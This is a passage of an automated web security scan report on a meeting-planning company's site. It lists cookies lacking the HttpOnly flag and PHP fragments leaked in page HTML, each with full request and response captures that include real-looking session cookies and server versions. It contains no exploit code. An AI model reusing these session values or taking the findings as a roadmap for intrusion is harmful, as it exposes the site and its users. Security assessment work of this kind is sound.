<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.162. http://www2.starcite.com/starcite/themes/garland/views-list-webinarview.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/views-list-webinarview.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/views-list-webinarview.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:12 GMT
Server: Apache
Last-Modified: Wed, 13 Aug 2008 19:12:00 GMT
ETag: "1000000002c5c-45e-4545c29b08000"
Accept-Ranges: bytes
Content-Length: 1118
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:37 GMT;path=/

/* *
* views template to output the stylesheet to customize a view.
* This code was generated by the views theming wizard
* Date: Wed, 07/30/2008 - 04:42
* View: webinarview
*
* The class
...[SNIP]...

2.163. http://www2.starcite.com/starcite/themes/garland/views-list-whatwedocustomersuccessview.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/views-list-whatwedocustomersuccessview.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/views-list-whatwedocustomersuccessview.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:35 GMT
Server: Apache
Last-Modified: Fri, 03 Oct 2008 19:55:00 GMT
ETag: "1000000002c5e-312-4585eb5604d00"
Accept-Ranges: bytes
Content-Length: 786
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:00 GMT;path=/

/* *
* views template to output the stylesheet to customize a view.
* This code was generated by the views theming wizard
* Date: Fri, 10/03/2008 - 03:20
* View: whatwedocustomersuccessview

...[SNIP]...

2.164. http://www2.starcite.com/starcite/whatwedo/ourtechnology

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/ourtechnology

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/whatwedo/ourtechnology HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:50 GMT;path=/
Content-Length: 23419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.165. http://www2.starcite.com/starcite/whatwedo/overview

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/overview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/whatwedo/overview HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:59:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:21:56 GMT;path=/
Content-Length: 24905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.166. http://www2.starcite.com/starcite/whatwedo/starcitenetwork

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/starcitenetwork

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_Pvutjef-NluXfc-IUUQ

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/whatwedo/starcitenetwork HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:51 GMT;path=/
Content-Length: 21350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

3. Source code disclosure

There are 12 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


3.1. http://www2.starcite.com/starcite/destinationsolutions/finddestinations

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/destinationsolutions/finddestinations

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/destinationsolutions/finddestinations HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=54
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:50 GMT;path=/
Content-Length: 36037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

3.2. http://www2.starcite.com/starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:25:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:25:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:58 GMT;path=/
Content-Length: 18313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...
</h3>


<?php//node 335 copied here by sharma ?>

   
<table>
...[SNIP]...
</table>


<?php//node 335 copied --ends here?>


</td>
...[SNIP]...
<td class="rightsection">
               
               <?php// print $sidebar_right;?>
               

               <div id="sidebar-right" class="sidebar">
...[SNIP]...

3.3. http://www2.starcite.com/starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=35
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:35:22 GMT;path=/
Content-Length: 17925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...
</h3>


<?php//node 335 copied here by sharma ?>

   
<table>
...[SNIP]...
</table>


<?php//node 335 copied --ends here?>


</td>
...[SNIP]...
<td class="rightsection">
               
               <?php// print $sidebar_right;?>
               

               <div id="sidebar-right" class="sidebar">
...[SNIP]...

3.4. http://www2.starcite.com/starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:08 GMT;path=/
Content-Length: 19158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...
</h3>


<?php//node 335 copied here by sharma ?>

   
<table>
...[SNIP]...
</table>


<?php//node 335 copied --ends here?>


</td>
...[SNIP]...
<td class="rightsection">
               
               <?php// print $sidebar_right;?>
               

               <div id="sidebar-right" class="sidebar">
...[SNIP]...

3.5. http://www2.starcite.com/starcite/planners/findtherightsolution

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/planners/findtherightsolution

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/planners/findtherightsolution HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:55 GMT;path=/
Content-Length: 29497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta name="Desc
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

3.6. http://www2.starcite.com/starcite/planners/howitworks

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/planners/howitworks

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/planners/howitworks HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:13 GMT;path=/
Content-Length: 26501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

3.7. http://www2.starcite.com/starcite/planners/requestmoreinformation

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/planners/requestmoreinformation

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/planners/requestmoreinformation HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:00 GMT;path=/
Content-Length: 52367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

3.8. http://www2.starcite.com/starcite/resource/findresources

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/resource/findresources

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/resource/findresources HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:59 GMT;path=/
Content-Length: 29216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

3.9. http://www2.starcite.com/starcite/suppliers/howitworks

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/suppliers/howitworks

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/suppliers/howitworks HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:12 GMT;path=/
Content-Length: 25233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

3.10. http://www2.starcite.com/starcite/whatwedo/ourtechnology

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/ourtechnology

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/whatwedo/ourtechnology HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
